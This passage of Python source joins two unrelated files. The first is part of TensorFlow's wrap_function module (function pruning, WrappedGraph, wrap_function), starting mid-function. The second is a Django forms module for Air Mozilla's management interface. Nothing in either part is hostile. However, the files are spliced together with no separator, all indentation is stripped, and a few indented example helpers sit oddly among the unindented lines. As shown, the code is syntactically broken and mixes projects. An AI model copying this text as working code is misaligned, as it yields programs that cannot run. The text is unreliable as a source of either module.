mutable_collection = ops.get_collection_ref(collection_name)
for index, current in enumerate(mutable_collection):
mutable_collection[index] = lifted_variables.get(id(current), current)
if not resource_variable_ops.is_resource_variable(
mutable_collection[index]):
logging.warning(
"Unable to create a python object for variable {} because it is "
"a reference variable. It may not be visible to training APIs. "
"If this is a problem, consider rebuilding the SavedModel after "
"running tf.compat.v1.enable_resource_variables().".format(
mutable_collection[index]))
# TODO(allenl): make this trackable
class WrappedFunction(function.ConcreteFunction):
"""Wraps a tf V1 piece of code in a function."""
def __init__(self, fn_graph, variable_holder, attrs=None, signature=None):
self._variable_holder = variable_holder
_lift_unlifted_variables(fn_graph, variable_holder)
# We call __init__ after lifting variables so that the function's signature
# properly reflects the new captured inputs.
for f in fn_graph.as_graph_def().library.function:
context.context().add_function_def(f)
super(WrappedFunction, self).__init__(
fn_graph, attrs=attrs, signature=signature)
def prune(self, feeds, fetches, name=None, input_signature=None):
"""Extract a subgraph of this function's underlying graph.
Wraps the subgraph in a new `WrappedFunction` object.
Args:
feeds: Input tensors to the subgraph to extract, as `Tensor` objects.
fetches: Possibly-nested Python data structure containing information
about outputs of the target subgraph. Each entry can either be a
`Tensor` object (for data outputs), an `Operation` object (for control
outputs), or a `TensorInfo` proto. Any additional shape/dtype
information provided in a `TensorInfo` and not present in the original
graph will be added to the returned subgraph.
name: (optional) Name to give to the underlying `FuncGraph` of the
returned object. If no name is provided, the graph's name will be
`"pruned"`.
input_signature: (optional) possibly-nested Python data structure
containing `TensorSpec` objects, with which to populate the returned
function's `FuncGraph`'s `structured_input_signature` field.
Returns:
A new `WrappedFunction` object containing a copy of the portion of this
object's graph that goes from `feeds` to `fetches`.
"""
# TODO(b/129646028): Add support for CompositeTensors.
name = name or "pruned"
flat_feeds = nest.flatten(feeds, expand_composites=True)
flat_feeds = [self.graph.as_graph_element(t) for t in flat_feeds]
for f in flat_feeds:
if not isinstance(f, ops.Tensor):
raise ValueError("Feeds must be tensors.")
# Ignoring all feeds that are captures allows prune to be called
# using wrapped_func.inputs even when it uses variables
internal_captures = {id(c) for c in self.graph.internal_captures}
flat_feeds = [f for f in flat_feeds if id(f) not in internal_captures]
operation_fetches = []
tensor_fetches = []
tensor_infos = []
def _fetch_preprocessing_callback(fetch):
"""Extract out lists of ops, tensors, and tensor type info.
Turns TensorInfos into Tensors in the original `fetches` structure.
Also extracts ops from `fetches`.
Args:
fetch: The fetch to preprocess: Tensor, TensorInfo, or Operation, or
string identifying a Tensor or Operation.
Returns:
`fetch` converted to a Tensor.
"""
if isinstance(fetch, ops.Operation):
operation_fetches.append(fetch)
return fetch
elif isinstance(fetch, meta_graph_pb2.TensorInfo):
tensor_infos.append(fetch)
decoded = _get_element_from_tensor_info(fetch, self._func_graph)
if (tensor_util.is_tensor(decoded) or
isinstance(decoded, composite_tensor.CompositeTensor)):
tensor_fetches.append(decoded)
else:
operation_fetches.append(decoded)
return decoded
elif isinstance(fetch, (ops.Tensor, composite_tensor.CompositeTensor)):
tensor_fetches.append(fetch)
return fetch
else:
graph_element = self.graph.as_graph_element(fetch)
return _fetch_preprocessing_callback(graph_element)
fetches = nest.map_structure(_fetch_preprocessing_callback, fetches)
# Expand composite tensors into their component dense Tensors.
tensor_fetches = nest.flatten(tensor_fetches, expand_composites=True)
for f in (flat_feeds + tensor_fetches + operation_fetches):
if f.graph is not self._func_graph:
raise ValueError("Can only prune function whose feeds and fetches "
"are from this graph (%s). Input %s is from graph %s" %
(self._func_graph, f, f.graph))
with self._func_graph.as_default():
pruned_graph = func_graph.FuncGraph(name)
lift_map = lift_to_graph.lift_to_graph(
operation_fetches + tensor_fetches,
pruned_graph,
sources=flat_feeds + self.graph.internal_captures)
# Note that we add the component tensors of any composite tensors to the
# returned function's outputs list; the list must contain these component
# tensors, or the function's sparse outputs won't work properly.
pruned_graph.outputs.extend(lift_map[x] for x in tensor_fetches)
pruned_graph.control_outputs.extend(
[lift_map[operation] for operation in operation_fetches])
pruned_graph.inputs.extend(lift_map[x] for x in flat_feeds)
for external_capture, internal_capture in self.graph.captures:
pruned_graph.add_capture(external_capture, lift_map[internal_capture])
for ti in tensor_infos:
if ti.WhichOneof("encoding") == "name": # Dense tensors only
t = pruned_graph.as_graph_element(ti.name)
if tensor_util.is_tensor(t):
t.set_shape(tensor_shape.TensorShape(ti.tensor_shape))
# pylint: disable=protected-access
for f in self.graph._functions.values():
pruned_graph._add_function(f)
# pylint: enable=protected-access
pruned_graph.variables = self.graph.variables
def _structured_output_mapping(fetched):
"""callback for `nest.map_structure()`"""
lifted = lift_map[fetched]
if isinstance(lifted, ops.Operation):
return None
return lifted
# expand_composites=True here causes composite tensors to be expanded
# into their component dense Tensors, mapped to the new graph, and then
# reconstituted into their original composite form.
pruned_graph.structured_outputs = nest.map_structure(
_structured_output_mapping, fetches, expand_composites=True)
pruned_graph.structured_input_signature = input_signature
pruned_fn = WrappedFunction(
pruned_graph, variable_holder=self._variable_holder)
pruned_fn._num_positional_args = len(flat_feeds) # pylint: disable=protected-access
# TODO(kathywu): Enable keyword arguments if an input signature is specified
pruned_fn._arg_keywords = [tensor.op.name for tensor in flat_feeds] # pylint: disable=protected-access
return pruned_fn
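# Illustrative sketch, not part of the original module: pruning a wrapped
# function down to explicitly named feeds and fetches. The tensor names
# "x:0" and "out:0" are assumptions about the caller's graph, not API.
def _example_prune(wrapped):
  x = wrapped.graph.get_tensor_by_name("x:0")      # assumed feed name
  out = wrapped.graph.get_tensor_by_name("out:0")  # assumed fetch name
  # Returns a new WrappedFunction that computes `out` from `x`.
  return wrapped.prune(feeds=x, fetches=out)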
def _filter_returned_ops(fn):
"""Filtering out any ops returned by function.
Args:
fn: a function
Returns:
A tuple of (
Wrapped function that returns `None` in place of any ops,
dict that maps the index in the flat output structure to the returned op
)
"""
returned_ops = {}
def wrap_and_filter_returned_ops(*args, **kwargs):
outputs = fn(*args, **kwargs)
flat_outputs = nest.flatten(outputs)
for n, output in enumerate(flat_outputs):
if isinstance(output, ops.Operation):
returned_ops[n] = output
flat_outputs[n] = None
return nest.pack_sequence_as(outputs, flat_outputs)
return wrap_and_filter_returned_ops, returned_ops
class WrappedGraph(object):
"""Class for wrapping multiple TF 1.X functions in a single graph.
Maintains a dictionary mapping names to wrapped functions. See
`tf.compat.v1.wrap_function` to learn more about wrapping V1 functions.
Functions wrapped using this class have access to variables and collections
created in other wrapped functions, using the standard TF 1.X API (
`tf.compat.v1.get_variable` or
`tf.compat.v1.get_default_graph().get_collection(...)`)
Outside a function, variables and collections may be accessed using the
`variables` and `graph` properties.
Example:
```
def add_v1(x):
with tf.compat.v1.variable_scope('vars', reuse=tf.compat.v1.AUTO_REUSE):
v = tf.compat.v1.get_variable('v', shape=[], dtype=tf.int32)
return v + x
def increment_var_v1(x):
with tf.compat.v1.variable_scope('vars', reuse=tf.compat.v1.AUTO_REUSE):
v = tf.compat.v1.get_variable('v', shape=[], dtype=tf.int32)
return v.assign_add(x)
g = WrappedGraph()
add = g.wrap_function(add_v1, [tf.TensorSpec([], tf.int32)])
increment_var = g.wrap_function(increment_var_v1,
[tf.TensorSpec([], tf.int32)])
assert len(g.variables) == 1
assert g.variables[0].numpy() == 0
increment_var(tf.constant(5))
assert g.variables[0].numpy() == 5
```
"""
def __init__(self, variable_holder=None, **kwargs):
self._variable_holder = (
variable_holder or VariableHolder(share_variables=True))
name = kwargs.pop("name", "wrapped_function_graph")
# Always start with empty collections, unless otherwise specified. Setting
# `collections=None` will copy the collections from the outer graph.
collections = kwargs.pop("collections", {})
self.graph = func_graph.FuncGraph(name, collections=collections, **kwargs)
self._wrapped_function = WrappedFunction(self.graph, self._variable_holder)
self._functions = {}
@property
def functions(self):
return self._functions
@property
def variables(self):
return self._variable_holder.variables
def wrap_function(self, fn, signature, name=None):
"""Wraps a TF 1.X function and returns an eager-compatible function.
All functions wrapped in the same `WrappedGraph` will have access to the
same graph (`tf.compat.v1.get_default_graph` to get the graph object
within a function, or `WrappedGraph.graph` to get the graph outside a
function). Variables created within the function will be added to the
`variables` list.
Function inputs: All inputs to the function must be tensors (nested ok),
with their shapes and dtypes defined in the `signature` argument.
Function outputs:
* The 1.X function may return tensors, variables, and ops. The wrapped
eager-compatible function will always return tensors in the same nested
structure.
* Variables are replaced with a tensor containing the latest read values.
* Returned ops are executed, and replaced with None.
* The order of op execution and variable reads in the return is
nondeterministic. For example:
```
def update_var(x):
v = tf.Variable(0)
op = tf.compat.v1.assign(v, x).op
return v, op
g = WrappedGraph()
fn = g.wrap_function(update_var, [tf.TensorSpec([], tf.int32)])
read_value, _ = fn(tf.constant(3))
print(read_value.numpy()) # could be 0 or 3
print(g.variables[0].numpy()) # always 3
```
To ensure that ops in the function are executed (e.g. ops added to the
`tf.GraphKeys.UPDATE_OPS` collection), include them in the function returns.
Args:
fn: a 1.X tensorflow function.
signature: a possibly nested sequence of `TensorSpecs` specifying the
shapes and dtypes of the arguments.
name: an optional string name for the function. The function will be saved
with key `name` in the `functions` dictionary.
Returns:
An eager-compatible function.
"""
return self._wrap_function(fn, signature=signature, name=name)
def _wrap_function(self,
fn,
args=None,
kwargs=None,
signature=None,
name=None):
"""Internal wrap function method with extended func_graph arguments."""
fn_with_filter_and_scope, returned_ops = _filter_returned_ops(
self._variable_holder.call_with_variable_creator_scope(fn))
func_graph.func_graph_from_py_func(
None, # Name is unused.
fn_with_filter_and_scope,
args=args,
kwargs=kwargs,
signature=signature,
add_control_dependencies=False,
func_graph=self.graph)
# This code relies on questionable behavior from `func_graph_from_py_func`.
# If an existing FuncGraph is passed into the `func_graph` arg, the inputs
# and structured outputs are overwritten. Pretty sure this is a bug,
# the structured outputs don't match up with the outputs...
fn_inputs = self.graph.inputs[:-len(self.graph.captures)]
# Return filtered ops to the flattened outputs.
flat_fn_outputs = nest.flatten(self.graph.structured_outputs)
for index, op in returned_ops.items():
flat_fn_outputs[index] = op
fn_outputs = nest.pack_sequence_as(self.graph.structured_outputs,
flat_fn_outputs)
name = name or fn.__name__
wrapped_function = self._wrapped_function.prune(
fn_inputs, fn_outputs, name, self.graph.structured_input_signature)
self._functions[name] = wrapped_function
return wrapped_function
@tf_export(v1=["wrap_function"])
def wrap_function(fn, signature, name=None):
"""Wraps the TF 1.x function fn into a graph function.
The python function `fn` will be called once with symbolic arguments specified
in the `signature`, traced, and turned into a graph function. Any variables
created by `fn` will be owned by the object returned by `wrap_function`. The
resulting graph function can be called with tensors which match the
signature.
```python
def f(x, do_add):
v = tf.Variable(5.0)
if do_add:
op = v.assign_add(x)
else:
op = v.assign_sub(x)
with tf.control_dependencies([op]):
return v.read_value()
f_add = tf.compat.v1.wrap_function(f, [tf.TensorSpec((), tf.float32), True])
assert float(f_add(1.0)) == 6.0
assert float(f_add(1.0)) == 7.0
# Can call tf.compat.v1.wrap_function again to get a new trace, a new set
# of variables, and possibly different non-template arguments.
f_sub= tf.compat.v1.wrap_function(f, [tf.TensorSpec((), tf.float32), False])
assert float(f_sub(1.0)) == 4.0
assert float(f_sub(1.0)) == 3.0
```
Both `tf.compat.v1.wrap_function` and `tf.function` create a callable
TensorFlow graph. But while `tf.function` runs all stateful operations
(e.g. `tf.print`) and sequences operations to provide the same semantics as
eager execution, `wrap_function` is closer to the behavior of `session.run` in
TensorFlow 1.x. It will not run any operations unless they are required to
compute the function's outputs, either through a data dependency or a control
dependency. Nor will it sequence operations.
Unlike `tf.function`, `wrap_function` will only trace the Python function
once. As with placeholders in TF 1.x, shapes and dtypes must be provided to
`wrap_function`'s `signature` argument.
Since it is only traced once, variables and state may be created inside the
function and owned by the function wrapper object.
Args:
fn: python function to be wrapped
signature: the placeholder and python arguments to be passed to the wrapped
function
name: Optional. The name of the function.
Returns:
the wrapped graph function.
"""
holder = VariableHolder(fn)
func_graph_name = "wrapped_function"
if name is not None:
func_graph_name = "wrapped_function_" + name
return WrappedFunction(
func_graph.func_graph_from_py_func(
func_graph_name,
holder,
args=None,
kwargs=None,
signature=signature,
add_control_dependencies=False,
collections={}),
variable_holder=holder,
signature=signature)
def function_from_graph_def(graph_def, inputs, outputs):
"""Creates a ConcreteFunction from a GraphDef.
Args:
graph_def: A GraphDef to make a function out of.
inputs: A Tensor name or nested structure of names in `graph_def` which
should be inputs to the function.
outputs: A Tensor name or nested structure of names in `graph_def` which
should be outputs of the function.
Returns:
A ConcreteFunction.
"""
def _imports_graph_def():
importer.import_graph_def(graph_def, name="")
wrapped_import = wrap_function(_imports_graph_def, [])
import_graph = wrapped_import.graph
return wrapped_import.prune(
nest.map_structure(import_graph.as_graph_element, inputs),
nest.map_structure(import_graph.as_graph_element, outputs))
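# Illustrative sketch, not part of the original module: turning a frozen
# GraphDef into a callable. The tensor names "x:0" and "y:0" are
# assumptions about the supplied graph_def, not a fixed convention.
def _example_function_from_graph_def(graph_def):
  fn = function_from_graph_def(graph_def, inputs="x:0", outputs="y:0")
  # Eagerly call into the imported graph with a scalar input.
  return fn(ops.convert_to_tensor(2.0))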
import re
import datetime
from collections import defaultdict
import dateutil.parser
import pytz
from django import forms
from django.db.models import Count
from django.conf import settings
from django.contrib.auth.models import User, Group
from django.utils.timezone import utc
from django.utils.safestring import mark_safe
from django.core.urlresolvers import reverse
from slugify import slugify
from airmozilla.base.forms import BaseModelForm, BaseForm
from airmozilla.manage import url_transformer
from airmozilla.main.models import (
Approval,
Event,
EventTweet,
Location,
Region,
Tag,
Template,
Channel,
SuggestedEvent,
SuggestedEventComment,
URLMatch,
EventAssignment,
LocationDefaultEnvironment,
RecruitmentMessage,
Picture,
Topic,
Chapter,
)
from airmozilla.comments.models import Discussion, Comment
from airmozilla.surveys.models import Question, Survey
from airmozilla.staticpages.models import StaticPage
from airmozilla.base.helpers import show_duration_compact
from .widgets import PictureWidget
TIMEZONE_CHOICES = [(tz, tz.replace('_', ' ')) for tz in pytz.common_timezones]
ONE_HOUR = 60 * 60
class UserEditForm(BaseModelForm):
class Meta:
model = User
fields = ('is_active', 'is_staff', 'is_superuser', 'groups')
def clean(self):
cleaned_data = super(UserEditForm, self).clean()
is_active = cleaned_data.get('is_active')
is_staff = cleaned_data.get('is_staff')
is_superuser = cleaned_data.get('is_superuser')
groups = cleaned_data.get('groups')
if is_superuser and not is_staff:
raise forms.ValidationError('Superusers must be staff.')
if is_staff and not is_active:
raise forms.ValidationError('Staff must be active.')
if is_staff and not is_superuser and not groups:
raise forms.ValidationError(
'Non-superuser staff must belong to a group.'
)
return cleaned_data
class GroupEditForm(BaseModelForm):
def __init__(self, *args, **kwargs):
super(GroupEditForm, self).__init__(*args, **kwargs)
self.fields['name'].required = True
choices = self.fields['permissions'].choices
self.fields['permissions'] = forms.MultipleChoiceField(
choices=choices,
widget=forms.CheckboxSelectMultiple,
required=False
)
class Meta:
model = Group
fields = ('name', 'permissions')
class EventRequestForm(BaseModelForm):
tags = forms.CharField(required=False)
class Meta:
model = Event
widgets = {
'description': forms.Textarea(attrs={'rows': 4}),
'short_description': forms.Textarea(attrs={'rows': 2}),
'call_info': forms.Textarea(attrs={'rows': 3}),
'additional_links': forms.Textarea(attrs={'rows': 3}),
'template_environment': forms.Textarea(attrs={'rows': 3}),
'remote_presenters': forms.Textarea(attrs={'rows': 3}),
'start_time': forms.DateTimeInput(format='%Y-%m-%d %H:%M'),
'estimated_duration': forms.widgets.Select(
choices=Event.ESTIMATED_DURATION_CHOICES
),
}
exclude = ('featured', 'status', 'archive_time', 'slug')
# Fields specified to enforce order
fields = (
'title', 'placeholder_img', 'picture',
'description',
'short_description', 'location', 'start_time',
'estimated_duration',
'channels', 'tags', 'call_info',
'remote_presenters',
'additional_links', 'privacy', 'popcorn_url'
)
def __init__(self, *args, **kwargs):
super(EventRequestForm, self).__init__(*args, **kwargs)
self.fields['channels'].help_text = (
'<a href="%s" class="btn btn-default" target="_blank">'
'<i class="glyphicon glyphicon-plus-sign"></i>'
'New channel'
'</a>' % reverse('manage:channel_new'))
self.fields['placeholder_img'].label = 'Placeholder image'
if 'instance' in kwargs:
event = kwargs['instance']
approvals = event.approval_set.all()
self.initial['approvals'] = [app.group for app in approvals]
if event.location:
self.fields['start_time'].help_text = (
'Time zone of this date is that of {0}.'.format(
event.location.timezone
)
)
# when the django forms present the start_time form field,
# it's going to first change it to UTC, then strftime it
self.initial['start_time'] = (
event.location_time.replace(tzinfo=utc)
)
else:
self.fields['start_time'].help_text = (
'Since there is no location, the time zone of this date '
'is UTC.'
)
if event.pk:
tags_formatted = ','.join(x.name for x in event.tags.all())
self.initial['tags'] = tags_formatted
def clean_tags(self):
tags = self.cleaned_data['tags']
split_tags = [t.strip() for t in tags.split(',') if t.strip()]
final_tags = []
for tag_name in split_tags:
try:
t = Tag.objects.get(name=tag_name)
except Tag.DoesNotExist:
try:
t = Tag.objects.get(name__iexact=tag_name)
except Tag.DoesNotExist:
t = Tag.objects.create(name=tag_name)
final_tags.append(t)
return final_tags
def clean_slug(self):
"""Enforce unique slug across current slugs and old slugs."""
slug = self.cleaned_data['slug']
if Event.objects.filter(slug=slug).exclude(pk=self.instance.id):
raise forms.ValidationError('This slug is already in use.')
return slug
@staticmethod
def _check_staticpage_slug(slug):
if StaticPage.objects.filter(url__startswith='/%s' % slug).count():
raise forms.ValidationError(
"The default slug for event would clash with an existing "
"static page with the same URL. It might destroy existing "
"URLs that people depend on."
)
def clean(self):
data = super(EventRequestForm, self).clean()
if data.get('title') and not data.get('slug'):
# this means you have submitted a form without being explicit
# about what the slug will be
self._check_staticpage_slug(slugify(data.get('title')).lower())
elif data.get('slug'):
# are you trying to change it?
if self.instance.slug != data['slug']:
# apparently, you want to change to a new slug
self._check_staticpage_slug(data['slug'])
return data
class EventEditForm(EventRequestForm):
approvals = forms.ModelMultipleChoiceField(
queryset=Group.objects.filter(permissions__codename='change_approval'),
required=False,
widget=forms.CheckboxSelectMultiple()
)
curated_groups = forms.CharField(
required=False,
help_text='Curated groups only matter if the event is open to'
' "%s".' % [x[1] for x in Event.PRIVACY_CHOICES
if x[0] == Event.PRIVACY_CONTRIBUTORS][0]
)
class Meta(EventRequestForm.Meta):
exclude = ('archive_time',)
# Fields specified to enforce order
fields = (
'title', 'slug', 'status', 'privacy', 'curated_groups',
'featured', 'template',
'template_environment', 'placeholder_img', 'picture',
'location',
'description', 'short_description', 'start_time',
'estimated_duration',
'archive_time',
'channels', 'tags',
'call_info', 'additional_links', 'remote_presenters',
'approvals',
'popcorn_url',
'pin',
'recruitmentmessage',
)
def __init__(self, *args, **kwargs):
super(EventEditForm, self).__init__(*args, **kwargs)
if 'pin' in self.fields:
self.fields['pin'].help_text = (
"Use of pins is deprecated. Use Curated groups instead."
)
self.fields['popcorn_url'].label = 'Popcorn URL'
if 'recruitmentmessage' in self.fields:
self.fields['recruitmentmessage'].required = False
self.fields['recruitmentmessage'].label = 'Recruitment message'
self.fields['location'].queryset = (
Location.objects.filter(is_active=True).order_by('name')
)
if self.instance and self.instance.id:
# Checking for id because it might be an instance but never
# been saved before.
self.fields['picture'].widget = PictureWidget(self.instance)
# make the list of approval objects depend on requested approvals
# print Group.approval_set.filter(event=self.instance)
group_ids = [
x[0] for x in
Approval.objects
.filter(event=self.instance).values_list('group')
]
self.fields['approvals'].queryset = Group.objects.filter(
id__in=group_ids
)
# If the event has a duration, it doesn't make sense to
# show the estimated_duration widget.
if self.instance.duration:
del self.fields['estimated_duration']
elif self.initial.get('picture'):
self.fields['picture'].widget = PictureWidget(
Picture.objects.get(id=self.initial['picture']),
editable=False
)
else:
# too early to associate with a picture
del self.fields['picture']
def clean_pin(self):
value = self.cleaned_data['pin']
if value and len(value) < 4:
raise forms.ValidationError("Pin too short to be safe")
return value
def clean(self):
cleaned_data = super(EventEditForm, self).clean()
if not (
cleaned_data.get('placeholder_img') or cleaned_data.get('picture')
):
raise forms.ValidationError("Must have a placeholder or a Picture")
return cleaned_data
class EventExperiencedRequestForm(EventEditForm):
class Meta(EventEditForm.Meta):
exclude = ('featured', 'archive_time', 'slug')
# Fields specified to enforce order
fields = (
'title', 'status', 'privacy', 'template',
'template_environment', 'placeholder_img', 'picture',
'description',
'short_description', 'location', 'start_time',
'estimated_duration',
'channels', 'tags', 'call_info',
'additional_links', 'remote_presenters',
'approvals', 'pin', 'popcorn_url', 'recruitmentmessage'
)
class EventArchiveForm(BaseModelForm):
class Meta(EventRequestForm.Meta):
exclude = ()
fields = ('template', 'template_environment')
class EventArchiveTimeForm(BaseModelForm):
class Meta(EventRequestForm.Meta):
exclude = ()
fields = ('archive_time',)
def __init__(self, *args, **kwargs):
super(EventArchiveTimeForm, self).__init__(*args, **kwargs)
self.fields['archive_time'].help_text = (
"Input timezone is <b>UTC</b>"
)
if self.initial['archive_time']:
# Force it to a UTC string so Django doesn't convert it
# to a timezone-less string in the settings.TIME_ZONE timezone.
self.initial['archive_time'] = (
self.initial['archive_time'].strftime('%Y-%m-%d %H:%M:%S')
)
def clean_archive_time(self):
value = self.cleaned_data['archive_time']
# force it back to UTC
if value:
value = value.replace(tzinfo=utc)
return value
class EventTweetForm(BaseModelForm):
class Meta:
model = EventTweet
fields = (
'text',
'include_placeholder',
'send_date',
)
widgets = {
'text': forms.Textarea(attrs={
'autocomplete': 'off',
'data-maxlength': 140,
'rows': 2,
})
}
def __init__(self, event, *args, **kwargs):
super(EventTweetForm, self).__init__(*args, **kwargs)
self.fields['text'].help_text = (
'<b class="char-counter">140</b> characters left. '
'<span class="char-counter-warning"><b>Note!</b> Sometimes '
'Twitter can count it as longer than it appears if you '
'include a URL. '
'It\'s usually best to leave a little room.</span>'
)
# it's a NOT NULL field but it defaults to NOW()
# in the views code
self.fields['send_date'].required = False
if event.tags.all():
def pack_tags(tags):
return '[%s]' % (','.join('"%s"' % x for x in tags))
self.fields['text'].help_text += (
'<br><a href="#" class="include-event-tags" '
'data-tags=\'%s\'>include all event tags</a>'
% pack_tags([x.name for x in event.tags.all()])
)
if event.placeholder_img or event.picture:
from airmozilla.main.helpers import thumbnail
if event.picture:
pic = event.picture.file
else:
pic = event.placeholder_img
thumb = thumbnail(pic, '160x90', crop='center')
self.fields['include_placeholder'].help_text = (
'<img src="%(url)s" alt="placeholder" class="thumbnail" '
'width="%(width)s" height="%(height)s">' %
{
'url': thumb.url,
'width': thumb.width,
'height': thumb.height
}
)
else:
del self.fields['include_placeholder']
if event.location:
self.fields['send_date'].help_text = (
'Timezone is %s' % event.location.timezone
)
class ChannelForm(BaseModelForm):
class Meta:
model = Channel
exclude = ('created',)
def __init__(self, *args, **kwargs):
super(ChannelForm, self).__init__(*args, **kwargs)
self.fields['parent'].required = False
if kwargs.get('instance'):
self.fields['parent'].choices = [
(x, y) for (x, y)
in self.fields['parent'].choices
if x != kwargs['instance'].pk
]
self.fields['cover_art'].help_text = (
"The cover art for podcasts needs to be at least 1400x1400 "
"pixels. Smaller versions that are needed will be derived "
"from this same image."
)
def clean(self):
cleaned_data = super(ChannelForm, self).clean()
if 'always_show' in cleaned_data and 'never_show' in cleaned_data:
# if one is true, the other one can't be
if cleaned_data['always_show'] and cleaned_data['never_show']:
raise forms.ValidationError(
"Can't both be on always and never shown"
)
return cleaned_data
class TemplateEditForm(BaseModelForm):
class Meta:
model = Template
widgets = {
'content': forms.Textarea(attrs={'rows': 20})
}
fields = (
'name',
'content',
'default_popcorn_template',
'default_archive_template',
)
class TemplateMigrateForm(BaseForm):
template = forms.ModelChoiceField(
widget=forms.widgets.RadioSelect(),
queryset=Template.objects.all()
)
def __init__(self, *args, **kwargs):
self.instance = kwargs.pop('instance')
super(TemplateMigrateForm, self).__init__(*args, **kwargs)
scheduled = defaultdict(int)
removed = defaultdict(int)
events = Event.objects.all()
for each in events.values('template').annotate(Count('template')):
scheduled[each['template']] = each['template__count']
events = events.filter(status=Event.STATUS_REMOVED)
for each in events.values('template').annotate(Count('template')):
removed[each['template']] = each['template__count']
choices = [('', '---------')]
other_templates = Template.objects.exclude(id=self.instance.id)
for template in other_templates.order_by('name'):
choices.append((
template.id,
'{0} ({1} events, {2} removed)'.format(
template.name,
scheduled[template.id],
removed[template.id],
)
))
self.fields['template'].choices = choices
class RecruitmentMessageEditForm(BaseModelForm):
class Meta:
model = RecruitmentMessage
widgets = {
'notes': forms.Textarea(attrs={'rows': 3})
}
exclude = ('modified_user', 'created')
class EventChapterEditForm(BaseModelForm):
timestamp = forms.CharField(widget=forms.widgets.TextInput(
attrs={
'placeholder': 'For example: 22m0s'
}
))
class Meta:
model = Chapter
widgets = {
'text': forms.widgets.TextInput()
}
exclude = ('user', 'created', 'event')
def __init__(self, *args, **kwargs):
self.max_timestamp = None
if kwargs.get('instance'):
self.max_timestamp = kwargs['instance'].event.duration
if kwargs['instance'].timestamp:
kwargs['instance'].timestamp = show_duration_compact(
kwargs['instance'].timestamp
)
super(EventChapterEditForm, self).__init__(*args, **kwargs)
def clean_timestamp(self):
value = self.cleaned_data['timestamp'].strip().replace(' ', '')
hours = re.findall(r'(\d{1,2})h', value)
minutes = re.findall(r'(\d{1,2})m', value)
seconds = re.findall(r'(\d{1,2})s', value)
if seconds:
seconds = int(seconds[0])
else:
seconds = 0
if minutes:
minutes = int(minutes[0])
else:
minutes = 0
if hours:
hours = int(hours[0])
else:
hours = 0
total = seconds + minutes * 60 + hours * 60 * 60
if not total:
raise forms.ValidationError('Must be greater than zero')
if self.max_timestamp:
if total >= self.max_timestamp:
raise forms.ValidationError('Longer than video duration')
return total
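# Worked examples for clean_timestamp above (illustrative; derived from the
# optional "<h>h", "<m>m", "<s>s" components combined into seconds):
#   "22m0s"  -> 22 * 60           = 1320
#   "1h2m3s" -> 3600 + 2 * 60 + 3 = 3723
#   "45s"    -> 45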
class SurveyEditForm(BaseModelForm):
class Meta:
model = Survey
exclude = ('created', 'modified')
def __init__(self, *args, **kwargs):
super(SurveyEditForm, self).__init__(*args, **kwargs)
self.fields['active'].validators.append(self.validate_active)
self.fields['events'].required = False
self.fields['events'].queryset = (
self.fields['events'].queryset.order_by('title')
)
def validate_active(self, value):
if value and not self.instance.question_set.count():
raise forms.ValidationError(
"Survey must have at least one question in order to be active"
)
class SurveyNewForm(BaseModelForm):
class Meta:
model = Survey
fields = ('name', )
class LocationEditForm(BaseModelForm):
timezone = forms.ChoiceField(choices=TIMEZONE_CHOICES)
def __init__(self, *args, **kwargs):
super(LocationEditForm, self).__init__(*args, **kwargs)
if 'instance' in kwargs:
initial = kwargs['instance'].timezone
else:
initial = settings.TIME_ZONE
self.initial['timezone'] = initial
class Meta:
model = Location
fields = ('name', 'timezone', 'is_active', 'regions')
class LocationDefaultEnvironmentForm(BaseModelForm):
class Meta:
model = LocationDefaultEnvironment
fields = ('privacy', 'template', 'template_environment')
widgets = {
'template_environment': forms.widgets.Textarea()
}
class RegionEditForm(BaseModelForm):
class Meta:
model = Region
fields = ('name', 'is_active')
class TopicEditForm(BaseModelForm):
class Meta:
model = Topic
fields = ('topic', 'sort_order', 'groups', 'is_active')
def __init__(self, *args, **kwargs):
super(TopicEditForm, self).__init__(*args, **kwargs)
self.fields['topic'].widget = forms.widgets.TextInput(attrs={
'placeholder': 'for example Partners for Firefox OS'
})
class ApprovalForm(BaseModelForm):
class Meta:
model = Approval
fields = ('comment',)
widgets = {
'comment': forms.Textarea(attrs={'rows': 3})
}
class HeadersField(forms.CharField):
widget = forms.widgets.Textarea
def __init__(self, *args, **kwargs):
super(HeadersField, self).__init__(*args, **kwargs)
self.help_text = self.help_text or mark_safe(
"For example <code>Content-Type: text/xml</code>"
)
def to_python(self, value):
if not value:
return {}
headers = {}
for line in [x.strip() for x in value.splitlines() if x.strip()]:
try:
key, value = line.split(':', 1)
except ValueError:
raise forms.ValidationError(line)
headers[key.strip()] = value.strip()
return headers
def prepare_value(self, value):
if isinstance(value, basestring):
# already prepared
return value
elif value is None:
return ''
out = []
for key in sorted(value):
out.append('%s: %s' % (key, value[key]))
return '\n'.join(out)
def widget_attrs(self, widget):
attrs = super(HeadersField, self).widget_attrs(widget)
if 'rows' not in attrs:
attrs['rows'] = 3
return attrs
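# Illustrative round-trip for HeadersField (not in the original source):
#   to_python("Content-Type: text/xml\nX-Frame-Options: DENY")
#     -> {'Content-Type': 'text/xml', 'X-Frame-Options': 'DENY'}
#   prepare_value({'Content-Type': 'text/xml'})
#     -> 'Content-Type: text/xml'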
class StaticPageEditForm(BaseModelForm):
headers = HeadersField(required=False)
class Meta:
model = StaticPage
fields = (
'url',
'title',
'content',
'privacy',
'template_name',
'allow_querystring_variables',
'headers',
)
def __init__(self, *args, **kwargs):
super(StaticPageEditForm, self).__init__(*args, **kwargs)
self.fields['url'].label = 'URL'
self.fields['template_name'].label = 'Template'
choices = (
('', 'Default'),
('staticpages/nosidebar.html', 'Default (but no sidebar)'),
('staticpages/blank.html', 'Blank (no template wrapping)'),
)
self.fields['template_name'].widget = forms.widgets.Select(
choices=choices
)
def clean_url(self):
value = self.cleaned_data['url']
if value.startswith('sidebar'):
# expect it to be something like
# 'sidebar_bottom_how-tos'
try:
__, __, channel_slug = value.split('_', 2)
except ValueError:
raise forms.ValidationError(
"Must be format like `sidebar_bottom_channel-slug`"
)
try:
Channel.objects.get(slug=channel_slug)
except Channel.DoesNotExist:
raise forms.ValidationError(
"No channel slug found called `%s`" % channel_slug
)
return value
def clean(self):
cleaned_data = super(StaticPageEditForm, self).clean()
if 'url' in cleaned_data and 'privacy' in cleaned_data:
if cleaned_data['url'].startswith('sidebar_'):
if cleaned_data['privacy'] != Event.PRIVACY_PUBLIC:
raise forms.ValidationError(
"If a sidebar the privacy must be public"
)
return cleaned_data
class VidlyURLForm(forms.Form):
url = forms.CharField(
required=True,
label='URL',
widget=forms.widgets.TextInput(attrs={
'placeholder': 'E.g. http://videos.mozilla.org/.../file.flv',
'class': 'input-xxlarge',
})
)
